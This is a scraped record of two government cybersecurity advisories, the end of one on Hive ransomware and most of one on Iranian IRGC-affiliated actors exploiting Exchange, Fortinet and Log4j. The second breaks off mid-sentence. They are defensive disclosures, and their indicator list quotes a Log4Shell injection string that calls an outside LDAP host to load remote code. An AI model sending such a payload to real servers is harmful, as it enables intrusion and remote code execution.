\nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nCommand and Scripting Interpreter\n\n| \n\n[T1059](<https://attack.mitre.org/versions/v12/techniques/T1059/>)\n\n| \n\nHive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or PowerShell. \n \n_Defense Evasion_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nIndicator Removal on Host\n\n| \n\n[T1070](<https://attack.mitre.org/versions/v12/techniques/T1070/>)\n\n| \n\nHive actors delete Windows event logs, specifically, the System, Security and Application logs. \n \nModify Registry\n\n| \n\n[T1112](<https://attack.mitre.org/versions/v12/techniques/T1112/>)\n\n| \n\nHive actors set registry values for DisableAntiSpyware and DisableAntiVirus to 1. \n \nImpair Defenses\n\n| \n\n[T1562](<https://attack.mitre.org/versions/v12/techniques/T1562/001/>)\n\n| \n\nHive actors seek processes related to backups, antivirus/anti-spyware, and file copying and terminates those processes to facilitate file encryption. \n \n_Exfiltration_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nTransfer Data to Cloud Account\n\n| \n\n[T1537](<https://attack.mitre.org/versions/v12/techniques/T1537/>)\n\n| \n\nHive actors exfiltrate data from victims, using a possible combination of Rclone and the cloud storage service Mega.nz. \n \n_Impact_ \n \nTechnique Title\n\n| \n\n| \n\nUse \n \nData Encrypted for Impact\n\n| \n\n[T1486](<https://attack.mitre.org/versions/v12/techniques/T1486/>)\n\n| \n\nHive actors deploy a ransom note HOW_TO_DECRYPT.txt into each affected directory which states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered. \n \nInhibit System Recovery\n\n| \n\n[T1490](<https://attack.mitre.org/versions/v12/techniques/T1490/>)\n\n| \n\nHive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin via command line or PowerShell. \n \n### Mitigations\n\nFBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:\n\n * Verify Hive actors no longer have access to the network.\n * Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). Consider leveraging a centralized patch management system to automate and expedite the process.\n * Require [phishing-resistant MFA](<https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf>) for as many services as possible\u2014particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.\n * If used, secure and monitor RDP. \n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure.\n * After assessing risks, if you deem RDP operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse.\n * If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.\n * Be sure to properly configure devices and enable security features.\n * Disable ports and protocols not used for business purposes, such as RDP Port 3389/TCP.\n * Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure. Ensure your backup data is not already infected.,\n * Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords/settings if applicable.\n * Install and regularly update anti-virus or anti-malware software on all hosts.\n * Enable PowerShell Logging including module logging, script block logging and transcription.\n * Install an enhanced monitoring tool such as Sysmon from Microsoft for increased logging.\n * Review the following additional resources. \n * The joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * The Cybersecurity and Infrastructure Security Agency-Multi-State Information Sharing &amp; Analysis Center [Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>) covers additional best practices and ways to prevent, protect, and respond to a ransomware attack.\n * [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) is the U.S. Government\u2019s official one-stop location for resources to tackle ransomware more effectively.\n\nIf your organization is impacted by a ransomware incident, FBI, CISA, and HHS recommend the following actions.\n\n * **Isolate the infected system**. Remove the infected system from all networks, and disable the computer\u2019s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected.\n * **Turn off other computers and devices**. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.\n * **Secure your backups**. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n\nIn addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.\n\n#### **Preparing for Cyber Incidents**\n\n * **Review the security posture of third-party vendors and those interconnected with your organization**. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * **Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs** under an established security policy.\n * **Document and monitor external remote connections**. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.\n * **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).\n\n#### **Identity and Access Management**\n\n * **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with [National Institute of Standards and Technology (NIST) standards](<https://pages.nist.gov/800-63-3/>) for developing and managing password policies. \n * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n * Store passwords in hashed format using industry-recognized password managers.\n * Add password user \u201csalts\u201d to shared login credentials.\n * Avoid reusing passwords.\n * Implement multiple failed login attempt account lockouts.\n * Disable password \u201chints.\u201d\n * Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised. \nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n * Require administrator credentials to install software.\n * **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n * **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n * **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n * **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. \n\n#### **Protective Controls and Architecture**\n\n * **Segment networks** to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n * **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool**. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * Install, regularly update, and enable real time detection for antivirus software on all hosts.\n\nVulnerability and Configuration Management\n\n * **Consider adding an email banner to emails** received from outside your organization.\n * **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n * **Ensure devices are properly configured and that security features are enabled**. \n * **Restrict Server Message Block (SMB) Protocol within the network to only access necessary servers and remove or disable outdated versions of SMB** (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.\n\n#### **REFERENCES**\n\n * [Stopransomware.gov](<http://www.stopransomware.gov/>) is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf>).\n * No-cost cyber hygiene services: [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) and [Ransomware Readiness Assessment](<https://github.com/cisagov/cset/>).\n\n#### **INFORMATION REQUESTED**\n\nThe FBI, CISA, and HHS do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim\u2019s files will be recovered. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or to CISA at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870. Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under US law, and prevent future attacks. \n\nThe FBI may seek the following information that you determine you can legally share, including:\n\n * Recovered executable files\n * Live random access memory (RAM) capture\n * Images of infected systems\n * Malware samples\n * IP addresses identified as malicious or suspicious\n * Email addresses of the attackers\n * A copy of the ransom note\n * Ransom amount\n * Bitcoin wallets used by the attackers\n * Bitcoin wallets used to pay the ransom\n * Post-incident forensic reports\n\n#### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.\n\n### Revisions\n\nInitial Version: November 17, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-25T12:00:00", "type": "ics", "title": "#StopRansomware: Hive Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-42321", "CVE-2023-26360"], "modified": "2022-11-25T12:00:00", "id": "AA22-321A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-321a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:09:43", "description": "### Summary\n\nActions to take today to protect against ransom operations:\n\n\u2022 Keep systems and software updated and prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Enforce MFA. \n\u2022 Make offline backups of your data.\n\nThis joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) - Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government\u2019s Islamic Revolutionary Guard Corps (IRGC). **Note**: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as \"the authoring agencies.\"\n\nThis advisory updates joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.\n\nSince the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report [APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.\n\nThe IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.\n\nThis advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.\n\nFor a downloadable copy of IOCs, see [AA22-257A.stix](<https://www.us-cert.gov/sites/default/files/AA22-257A.stix.xml>).\n\nFor more information on Iranian state-sponsored malicious cyber activity, see CISA\u2019s [Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) webpage and FBI\u2019s [Iran Threat](<https://www.fbi.gov/investigate/counterintelligence/the-iran-threat>) webpage.\n\nDownload the PDF version of this report: pdf, 836 kb\n\n### Technical Details\n\n#### Threat Actor Activity\n\nAs reported in joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>), [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>), and [CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>) (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>) and [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>). The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.\n\nSince the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) (\u201cLog4Shell\u201d), [CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>), and [CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) for initial access.\n\nThe IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or \u201cdouble extortion\u201d ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.\n\nIRGC-affiliated actor activity observed by the authoring agencies includes:\n\n * In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.\n * In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company\u2019s operations for an extended period.\n * In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.\n * In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company's network.\n\n#### MITRE ATT&amp;CK\u00ae Tactics and Techniques\n\nNote: This advisory uses the MITRE [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v11/techniques/enterprise/>) framework, version 11. See Appendix B for a table of the MITRE ATT&amp;CK tactics and techniques observed.\n\nThe authoring agencies assess the following tactics and techniques are associated with this activity.\n\n#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042>)]\n\nThe IRGC-affiliated actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v11/techniques/T1588/002>)] for a variety of tactics across the enterprise spectrum:\n\n * Fast Reverse Proxy (FRP) for command and control (C2)\n * Plink for C2\n * Remote Desktop Protocol (RDP) for lateral movement\n * BitLocker for data encryption\n * SoftPerfect Network Scanner for system network configuration discovery\n\nNote: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n#### Initial Access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)]\n\nAs stated in the Technical Details section previously reported in joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)].\n\nThe following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:\n\n * Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\n * C:\\inetpub\\wwwroot\\aspnet_client\\\n\nThe following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:\n\n * ${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)\n * RCE.class\n\n#### Execution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002>)]\n\nThe IRGC-affiliated actors may have made modifications to the Task Scheduler [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005>)]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:\n\n * Wininet\n * Wininet\u2019\n * WinLogon\n * CacheTask\n\nNote: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n#### Persistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003>)]\n\nThe IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [[T1136.001](<https://attack.mitre.org/versions/v11/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v11/techniques/T1136/002>)]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:\n\n * Domain Admin\n * it_admin\n * DefaultAccount\n * Default01\n\nNote: For additional account usernames associated with this activity, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n#### Exfiltration [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)]\n\nThe authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:\n\n * C:\\Windows\\Temp\\sassl[.]pmd\n * C:\\Windows\\Temp\\ssasl[.]zip\n * C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]dmp\n * C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]zip\n\n#### Impact [[TA0040](<https://attack.mitre.org/versions/v11/tactics/TA0040>)]\n\nThe IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity\u2019s networked printer(s). The notes included the following contact information:\n\n * @BuySafety (Telegram)\n * @WeRBits (Telegram)\n * +93794415076 (WhatsApp)\n * werbits@onionmail[.]org\n * buysafety@onionmail[.]org\n * yacashcash@rambler[.]ru\n\nNote: For additional contact information included in ransom notes, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n### DETECTION\n\nThe authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.\n\n * Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. \n * **Note**: Refer to Appendix A for IOCs.\n * Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021- 45105.\n * Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021- 34523, and CVE-2021-31207.\n * As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021- 31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470 because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.\n * Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.\n * Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.\n * Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.\n * Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.\n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks\u2014including each step these tasks perform\u2014for unrecognized \u201cactions.\u201d\n * Review antivirus logs for indications they were unexpectedly turned off.\n * Look for WinRAR and FileZilla in unexpected locations.\n * Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.\n\nNote: For additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.\n\n### Mitigations\n\nThe authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.\n\n#### Implement and Enforce Backup and Restoration Policies and Procedures\n\n * Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization\u2019s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses. \n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure.\n * Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.\n * Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n\n#### Patch and Update Systems\n\n * U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free [CISA Cyber Hygiene Services Vulnerability Scanning](<https://www.cisa.gov/cyber-hygiene-services>) to enable continuous scans of public, static IPs for accessible services and vulnerabilities.\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.\n * Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021- 34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021- 31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021- 31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.\n\n#### Evaluate and Update Blocklists and Allowlists\n\n * Regularly evaluate and update blocklists and allowlists.\n * If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization\u2019s execution blocklist. Prevent any attempts to install or run this program and its associated files.\n\n#### Implement Network Segmentation\n\n * Implement network segmentation to restrict a malicious threat actor\u2019s lateral movement.\n\n#### Secure User Accounts\n\n * Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.\n * Require administrator credentials to install software.\n\n#### Implement Multifactor Authentication\n\n * Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.\n\n#### Use Strong Passwords\n\n * Require all accounts with password logins to have strong, unique passwords. See CISA Tip [Choosing and Protecting Passwords](<https://www.cisa.gov/tips/st04-002>) and National Institute of Standards and Technology (NIST) [Special Publication 800-63B: Digital Identity Guidelines](<https://csrc.nist.gov/publications/detail/sp/800-63b/final>) for more information.\n\n#### Secure and Monitor RDP and other Potentially Risky Services\n\n * If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.\n * Disable unused remote access/RDP ports.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.\n\n#### Use Antivirus Programs\n\n * Install and regularly update antivirus and anti-malware software on all hosts.\n\n#### Secure Remote Access\n\n * Only use secure networks.\n * Consider installing and using a VPN for remote access.\n\n### VALIDATE SECURITY CONTROLS\n\nIn addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.\n\nTo get started:\n\n 1. Select an ATT&amp;CK technique described in this advisory (see Appendix B).\n 2. Align your security technologies against the technique.\n 3. Test your technologies against the technique.\n 4. Analyze your detection and prevention technologies performance.\n 5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\n 6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.\n\nThe authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.\n\n### RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS\n\nIf a ransomware or extortion incident occurs at your organization:\n\n * Follow the Ransomware Response Checklist on page 11 of the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>).\n * Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.\n * Follow the notification requirements as outlined in your cyber incident response plan. \n * **U.S. organizations**: Report incidents to FBI at a [local FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI's 24/7 CyWatch at (855)292-3937 or cywatch@fbi.gov, 